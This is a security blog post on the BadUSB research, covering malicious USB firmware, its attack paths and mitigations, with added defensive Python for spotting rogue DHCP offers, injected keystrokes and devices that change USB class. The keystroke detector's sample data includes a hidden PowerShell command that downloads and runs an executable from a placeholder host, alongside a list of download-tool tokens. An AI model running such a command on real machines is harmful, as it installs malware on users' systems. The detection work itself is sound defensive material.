Every year, thousands of hackers and security researchers from around the world descend on Las Vegas to attend the annual Black Hat security conference. The conference boasts top-notch security presentations from industry leaders – often centered on breaking computer security. Although many of the presentations are about breaking things, most of the attendees and presenters are in fact using the knowledge for good – to design more secure software, better secure their organizations, or fix the security problems pointed out by the researchers.

For me this year, one particular presentation stood out as important to the future of antimalware protection. Karsten Nohl and Jakob Lell from SRLabs took to the stage in a packed hall to discuss attacks that can be carried out by computer accessories. A recording of their presentation is available on YouTube:

BadUSB - On Accessories that Turn Evil (YouTube video)
By Karsten Nohl, Sascha Krißler, and Jakob Lell

USB is a common industry standard for connecting peripherals like keyboards, webcams, and thumb drives to computers. During their presentation, the researchers illustrated a serious problem in how many USB devices are implemented. USB peripherals run their own processor and firmware to talk to the PC they are connected to, and the problems arise when the firmware on the USB peripheral is changed to be malicious. All major platforms such as Windows, Mac OS X, and Linux are affected since these problems are in the USB devices themselves, not the platforms they are connected to.

From the antimalware perspective, a problem arises if the firmware of a USB peripheral can be overwritten with firmware from actors other than the manufacturer without the user making a physical change to the device (e.g. flipping a physical switch on it). Unfortunately, the researchers showed that for many common USB thumb drives, software on the machine the drive is connected to can rewrite the firmware with code that did not come from the manufacturer, with no physical change at all. In essence, this means malware can rewrite USB thumb drive firmware.

OK, so now we know malware can rewrite USB thumb drive firmware, and probably the firmware of other devices as well, but is this a problem? Yes, but I'll explain at the end of this blog why this isn't an immediate problem for home users yet and how enterprise users can mitigate the risk.

Malware can overwrite the firmware so that the device acts maliciously and infects the machines it is connected to. Although malware can overwrite the firmware of some USB peripherals, the firmware itself is usually specific to each manufacturer and model.

For malware to spread as a worm across multiple models of USB peripherals would take a significant resource investment. For this reason, we don't believe an effective worm will be spreading using this approach in the near future.

The researchers described several ways a malicious firmware, once written to a device, could propagate like a worm:

  1. The USB peripheral (e.g. a USB thumb drive) can change its device type at any time to become a keyboard. This allows the firmware to send a series of specially crafted keystrokes that quickly download and install a virus on the computer it is connected to.
    In their demonstration this took almost two seconds, long enough that the PC's user would clearly see that something had happened, and it requires a user to be logged in to the PC at the time of the attack.
  2. The USB thumb drive can recognize that the PC is booting and present itself as a bootable device to take over the machine.
    This requires a USB device to be higher in the boot order than the regular hard drive, which is not the default on many PCs. A USB keyboard can be emulated during boot to change the boot order, but this process is highly dependent on the make and model of the machine. For these reasons, this method does not appear to be a big risk.
  3. Content on the thumb drive can be controlled at access time. If the device can distinguish a scan from a user read, the thumb drive could provide clean content to the antimalware software when scanned, but malicious content when a file is opened by the user.
  4. A malicious device exposes a large driver attack surface, since a USB device can choose which of many host drivers it talks to. In the future this could infect machines as soon as they are plugged in.
  5. The network connection can be modified with man-in-the-middle techniques by pretending to be a USB network card and replying to DHCP queries with a malicious DNS server, while letting the Internet traffic continue to flow through the normal adapter. It appears that any network adapter (not just the default Internet interface) can perform this DHCP DNS poisoning. This can allow credentials to be stolen from the user's browser session, and can allow malware to be loaded onto the machine by infecting downloaded binaries in transit.
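
The DHCP side of that last item can be checked on the host. The following is an added example, not code from the original post or from SRLabs: it parses the options field of a DHCP message and flags an OFFER that looks like the USB-NIC hijack, i.e. one that pushes DNS servers without supplying a default router, arrives on an interface other than the default-route interface, or names DNS servers outside a trusted set. The packets, interface names and trusted-DNS list are constructed for the example.

```python
import struct
from ipaddress import IPv4Address

DHCP_MAGIC = b"\x63\x82\x53\x63"
OPT_PAD, OPT_SUBNET, OPT_ROUTER, OPT_DNS, OPT_MSG_TYPE, OPT_SERVER_ID, OPT_END = 0, 1, 3, 6, 53, 54, 255
DHCPOFFER = 2


def parse_dhcp_options(packet: bytes) -> dict[int, bytes]:
    """Parse DHCP options: 236-byte fixed header, magic cookie, then code/length/value triples."""
    if len(packet) < 240 or packet[236:240] != DHCP_MAGIC:
        raise ValueError("not a DHCP message")
    opts, i = {}, 240
    while i < len(packet):
        code = packet[i]
        if code == OPT_PAD:
            i += 1
            continue
        if code == OPT_END:
            break
        if i + 2 > len(packet):
            raise ValueError("truncated option header")
        length = packet[i + 1]
        data = packet[i + 2:i + 2 + length]
        if len(data) != length:
            raise ValueError(f"truncated option {code}")
        opts[code] = opts.get(code, b"") + data  # RFC 3396: repeated options concatenate
        i += 2 + length
    return opts


def ip_list(data: bytes) -> list[str]:
    """Decode an option value holding zero or more IPv4 addresses."""
    if len(data) % 4:
        raise ValueError("address list is not a multiple of 4 bytes")
    return [str(IPv4Address(data[j:j + 4])) for j in range(0, len(data), 4)]


def assess_offer(iface: str, packet: bytes, default_route_iface: str, trusted_dns: set[str]) -> list[str]:
    """Return the reasons an OFFER received on `iface` looks like a DNS hijack; an empty list means clean."""
    opts = parse_dhcp_options(packet)
    if opts.get(OPT_MSG_TYPE) != bytes([DHCPOFFER]):
        return []
    dns = ip_list(opts.get(OPT_DNS, b""))
    routers = ip_list(opts.get(OPT_ROUTER, b""))
    reasons = []
    if dns and not routers:
        reasons.append("offers DNS servers but no router: name resolution is redirected while the "
                       "existing adapter keeps carrying the traffic")
    if dns and iface != default_route_iface:
        reasons.append(f"DNS servers pushed on non-default interface {iface}")
    untrusted = [d for d in dns if d not in trusted_dns]
    if untrusted:
        reasons.append(f"DNS servers outside the trusted set: {untrusted}")
    return reasons


def build_offer(options) -> bytes:
    """Construct a DHCPOFFER from (code, payload) pairs. Used only to build sample input here."""
    header = struct.pack("!BBBB4sHH4s4s4s4s16s64s128s", 2, 1, 6, 0, b"\x12\x34\x56\x78", 0, 0,
                         bytes(4), bytes([10, 0, 0, 2]), bytes(4), bytes(4), bytes(16), bytes(64), bytes(128))
    body = b"".join(bytes([code, len(payload)]) + payload for code, payload in options)
    return header + DHCP_MAGIC + body + bytes([OPT_END])


def _ip(s: str) -> bytes:
    return IPv4Address(s).packed


# Constructed samples: a rogue USB NIC that hands out only a DNS server, and a normal office lease.
ROGUE_OFFER = build_offer([(OPT_MSG_TYPE, bytes([DHCPOFFER])), (OPT_SERVER_ID, _ip("10.0.0.1")),
                           (OPT_SUBNET, _ip("255.255.255.0")), (OPT_DNS, _ip("10.0.0.1"))])
LEGIT_OFFER = build_offer([(OPT_MSG_TYPE, bytes([DHCPOFFER])), (OPT_SERVER_ID, _ip("192.168.1.1")),
                           (OPT_SUBNET, _ip("255.255.255.0")), (OPT_ROUTER, _ip("192.168.1.1")),
                           (OPT_DNS, _ip("192.168.1.1"))])
TRUSTED_DNS = {"192.168.1.1"}

if __name__ == "__main__":
    for name, iface, pkt in (("legit", "eth0", LEGIT_OFFER), ("rogue", "usb-eth0", ROGUE_OFFER)):
        print(name, assess_offer(iface, pkt, "eth0", TRUSTED_DNS) or ["clean"])
```

Which DNS server the operating system ultimately queries once two interfaces each supply one is platform-specific, and the presenters showed the hijack working in practice, so the safer policy is to treat any DNS-only lease from a newly attached interface as hostile and tune the router-less rule only for networks where such leases are legitimate.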

By design, the only way to read a device's firmware is to ask the firmware itself, so a malicious firmware can return whatever it likes; this means antimalware software is unable to fully scan a USB thumb drive or its firmware for infections. Antimalware software can, however, prevent and detect malware trying to rewrite the firmware of USB peripherals. It can also protect against the malware running on the computer just before or after infection by a malicious USB peripheral, just as with any other malware propagation. As the presenters pointed out, the solution to the USB peripheral problem lies primarily with the device manufacturers. They should make USB devices secure by default by:

  1. Only accepting digitally signed firmware updates from their manufacturer.
  2. Not accepting firmware updates and requiring physical modification to change the firmware – for example, this could be a physical switch on the USB thumb drive to enable rewriting of the firmware.
  3. Not accepting firmware updates at all.

These defenses would largely prevent the worm-like propagation of firmware-rewriting malware through USB peripherals.

I encourage anyone interested to watch the presentation for more details.

Implications to home users

Don't go throwing out your USB thumb drives and peripherals just yet. Until we start seeing malware actively using these techniques, home users have little to be afraid of. We hope the awareness created around this issue will drive device manufacturers to release firmware updates for problematic USB peripherals so that they no longer accept unsigned firmware updates, or disable firmware updates entirely. Some USB peripherals may have to be discarded in the future if they become targeted and no manufacturer update is made available.


Implications to enterprise users

Enterprise users who require USB thumb drives should look into upgrading to a model with non-writable firmware, or one that requires digitally signed firmware updates. Mass storage devices are among the most important USB peripherals to secure, since they are often plugged into multiple machines over their lifetime.

Employees should be careful about connecting their phones to enterprise computers by USB (e.g. to charge them). Connecting enterprise phones to personal computers should be avoided to reduce the risk of infecting the phone. Smartphones running outdated operating systems may be particularly susceptible to an infection that could then carry out USB attacks on the computers they are connected to.

Enterprises with highly sensitive data may need to evaluate the firmware update process for all the peripheral devices they currently use and are purchasing. Depending on the type of data held by the corporation, the country of manufacture as well as the distribution path of the devices may need to be considered.

Enterprise security software needs to start investing in protecting computers from USB peripherals. A software solution may be able to prevent a USB peripheral from changing device types, for example, or detect sequences of keystrokes that are deemed malicious or arrive too quickly to be human-typed.
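
As an added illustration of the keystroke side of that idea (my own example, not code from the post or from any product), here is a detector that works on a stream of timestamped keystrokes: it splits the stream into runs whose inter-key gap never exceeds a human typing rate, ignores short runs, and raises an alert when a machine-speed run carries a token such as "powershell" or a URL. The thresholds, the token list and the sample log are assumptions made for the example; a real deployment would feed it events from a keyboard filter driver and tune the thresholds against the organization's own typing data.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class KeyEvent:
    t_ms: int   # timestamp in milliseconds
    key: str    # character produced by the keystroke


# Thresholds are assumptions for this example, not figures from the presentation.
MAX_HUMAN_INTERVAL_MS = 40  # sustained gaps below this are faster than a person types
MIN_BURST_LEN = 12          # shorter runs (key repeat, chords, a fast word) are ignored

# Tokens that should not arrive inside a machine-speed burst (assumed list, extend per environment).
SUSPICIOUS_TOKENS = ("powershell", "cmd.exe", "iex", "iwr", "curl ", "wget ", "http://", "https://")


def find_injection_bursts(events, max_interval=MAX_HUMAN_INTERVAL_MS, min_len=MIN_BURST_LEN):
    """Return runs of consecutive keystrokes whose inter-key gap never exceeds max_interval."""
    bursts, start = [], 0
    for i in range(1, len(events) + 1):
        run_ends = i == len(events) or events[i].t_ms - events[i - 1].t_ms > max_interval
        if run_ends:
            if i - start >= min_len:
                bursts.append(events[start:i])
            start = i
    return bursts


def burst_text(burst) -> str:
    return "".join(e.key for e in burst)


def analyze(events):
    """Return (text, reason) for every burst that is both machine-fast and carries a suspicious token."""
    findings = []
    for burst in find_injection_bursts(events):
        text = burst_text(burst)
        per_key_ms = (burst[-1].t_ms - burst[0].t_ms) / max(len(burst) - 1, 1)
        hits = [tok for tok in SUSPICIOUS_TOKENS if tok in text.lower()]
        if hits:
            findings.append((text, f"{len(burst)} keys at {per_key_ms:.1f} ms/key containing {hits}"))
    return findings


def _typed(start_ms: int, text: str, interval_ms: int):
    """Construct a keystroke sequence typed at a fixed rate (sample data only)."""
    return [KeyEvent(start_ms + i * interval_ms, ch) for i, ch in enumerate(text)]


# Constructed sample log: a person typing at ~180 ms/key, then a device injecting a command at 8 ms/key.
SAMPLE_LOG = (
    _typed(0, "hello world", 180)
    + _typed(5000, 'powershell -w hidden -c "iwr http://example.invalid/x -o x.exe; ./x.exe"', 8)
)

if __name__ == "__main__":
    for text, reason in analyze(SAMPLE_LOG):
        print(f"ALERT: {reason}\n  {text}")
```

Timing is the useful signal here because an injecting device presents itself as a perfectly ordinary keyboard; nothing in the individual key reports distinguishes it from the user's own keyboard, but a person cannot sustain single-digit-millisecond gaps across dozens of keys.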

Similarly, hardware USB security hubs could be built to enforce device types on USB ports and prevent firmware rewriting – analogous to a traditional network firewall. The port each device is plugged into would define which device types that peripheral is allowed to present. Although this gives up some of the plug-and-play convenience USB was designed for, it partially mitigates the risk by preventing USB peripherals from arbitrarily changing their types.
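
The per-port policy described here, and the "drive that turns into a keyboard" case from item 1 of the list above, both come down to inspecting what a device declares when it enumerates. The following is an added example, not code from the post or from any hub or product: it walks a USB configuration descriptor, collects the bInterfaceClass of every interface the device exposes, checks that set against an allowlist for the physical port, and reports any class a device gained between two enumerations. The port names, the policy and the descriptors are constructed for the example; a real enforcement point would read descriptors from the host's USB stack or from the hub itself.

```python
import struct

# USB class codes (bInterfaceClass) relevant to the attacks discussed above.
USB_CLASS_CDC = 0x02           # communications: USB network adapters
USB_CLASS_HID = 0x03           # keyboards and mice
USB_CLASS_MASS_STORAGE = 0x08  # thumb drives
USB_CLASS_CDC_DATA = 0x0A      # data interface paired with CDC

DT_CONFIGURATION, DT_INTERFACE, DT_ENDPOINT = 0x02, 0x04, 0x05


def interface_classes(config_descriptor: bytes) -> list[int]:
    """Walk a configuration descriptor and list bInterfaceClass for every interface descriptor.
    Every descriptor starts with bLength and bDescriptorType; bInterfaceClass is byte 5 of an interface descriptor."""
    classes, off = [], 0
    while off < len(config_descriptor):
        if off + 2 > len(config_descriptor):
            raise ValueError("truncated descriptor header")
        b_length, b_type = config_descriptor[off], config_descriptor[off + 1]
        if b_length < 2 or off + b_length > len(config_descriptor):
            raise ValueError(f"bad bLength {b_length} at offset {off}")
        if b_type == DT_INTERFACE:
            if b_length < 9:
                raise ValueError("short interface descriptor")
            classes.append(config_descriptor[off + 5])
        off += b_length
    return classes


# Assumed per-port policy: which interface classes a device on each physical port may expose.
PORT_POLICY = {
    "port1": {USB_CLASS_MASS_STORAGE},  # the thumb-drive port
    "port2": {USB_CLASS_HID},           # the keyboard port
}


def check_device(port: str, config_descriptor: bytes, policy=PORT_POLICY):
    """Accept the device only if every interface it exposes is allowed on that port."""
    seen = set(interface_classes(config_descriptor))
    rogue = seen - policy.get(port, set())
    if rogue:
        return False, f"{port}: interface class(es) {[hex(c) for c in sorted(rogue)]} not permitted"
    return True, f"{port}: classes {[hex(c) for c in sorted(seen)]} permitted"


def new_classes(before: bytes, after: bytes) -> set[int]:
    """Classes a device gained between two enumerations, e.g. a drive that re-enumerates as a keyboard."""
    return set(interface_classes(after)) - set(interface_classes(before))


def build_config(interfaces) -> bytes:
    """Construct a configuration descriptor from (class, subclass, protocol, endpoint_count) tuples.
    Used only to build sample input here; endpoint attributes are placeholders irrelevant to the class check."""
    body = b""
    for num, (cls, sub, proto, n_ep) in enumerate(interfaces):
        # bLength, bDescriptorType, bInterfaceNumber, bAlternateSetting, bNumEndpoints,
        # bInterfaceClass, bInterfaceSubClass, bInterfaceProtocol, iInterface
        body += struct.pack("<BBBBBBBBB", 9, DT_INTERFACE, num, 0, n_ep, cls, sub, proto, 0)
        for ep in range(n_ep):
            # bLength, bDescriptorType, bEndpointAddress, bmAttributes, wMaxPacketSize, bInterval
            body += struct.pack("<BBBBHB", 7, DT_ENDPOINT, 0x81 + ep, 0x02, 64, 0)
    # bLength, bDescriptorType, wTotalLength, bNumInterfaces, bConfigurationValue, iConfiguration, bmAttributes, bMaxPower
    header = struct.pack("<BBHBBBBB", 9, DT_CONFIGURATION, 9 + len(body), len(interfaces), 1, 0, 0x80, 50)
    return header + body


# Constructed samples: a plain thumb drive, the same drive after malicious firmware added a keyboard
# interface, and a device posing as a USB network adapter.
THUMB_DRIVE = build_config([(USB_CLASS_MASS_STORAGE, 0x06, 0x50, 2)])
DRIVE_PLUS_KEYBOARD = build_config([(USB_CLASS_MASS_STORAGE, 0x06, 0x50, 2), (USB_CLASS_HID, 0x01, 0x01, 1)])
FAKE_NIC = build_config([(USB_CLASS_CDC, 0x06, 0x00, 1), (USB_CLASS_CDC_DATA, 0x00, 0x00, 2)])

if __name__ == "__main__":
    for port, desc in (("port1", THUMB_DRIVE), ("port1", DRIVE_PLUS_KEYBOARD), ("port1", FAKE_NIC), ("port2", THUMB_DRIVE)):
        print(check_device(port, desc)[1])
    print("gained:", [hex(c) for c in new_classes(THUMB_DRIVE, DRIVE_PLUS_KEYBOARD)])
```

A device can also re-enumerate with a different descriptor at any moment, which is exactly the keyboard trick in item 1, so the check has to run on every enumeration and not only the first time a device appears on the port.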

In conclusion, the enterprise security surrounding USB devices is heading towards an overhaul. The process may be painful, but it is necessary.

Geoff McDonald
MMPC